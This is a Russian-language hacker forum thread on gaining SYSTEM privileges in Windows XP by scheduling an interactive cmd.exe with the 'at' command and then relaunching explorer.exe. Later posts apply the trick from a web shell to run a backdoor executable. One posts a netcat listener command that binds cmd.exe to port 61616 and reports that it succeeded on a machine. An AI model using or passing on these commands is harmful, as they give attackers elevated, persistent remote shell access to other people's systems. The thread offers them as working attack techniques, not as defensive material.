получение системных привилегий под вин без сторонних утилит

Веселая довольно-таки фишка.

не знал про это честно..

что делает чел..

заходит под левым акком. дальше cmd.exe

т.е. он ставим задачу на открытие цмд через минуту...

проходит минута.. открываается ком. строка... но! уже с системными привилегиями!! =)))
челу ничего не остается как.. убить свой explorer.exe.. и загрузить через ту где привилегии новый.. вот и все.. проще простого..

бред-небред но все же )

PS работает не от геста, а от простого непревилегированного юзера.+ самого админа естесно win xp he sp2 + full patched.. джае если послденее то system вроде как выше чем обычный админ..

 

Прикольно) тоже не знал...

 

Не знал... Хмммммм =)

 

Под ограниченной учетной записью не пашет.

 

А... я вот пробовал. И не раз. А так вещица, то занимательная...

 

Если допустим есть веб-шелл, можно ли на удаленной машине так же запускать бакдооры с правами системы?

 

C:/folder/>at 20:22 /interactive "cmd.exe backdoor.exe"

 

Если у тебя есть права админа, то да. Если же веб-сервер запушен под ограниченной учетной записью, то скорее всего нет

 

Если вырубить сервис Task Scheduler - работать не будет.

 

вырубить этот сервис - чисто параноя ) можно еще все порты закрыть на всякий случай )

 

C:/folder/>at 20:22 /interactive "cmd.exe c:/system32/nc.exe -L -p 61616 -e cmd.exe"
У меня на 1 тачке прокатило с web шела.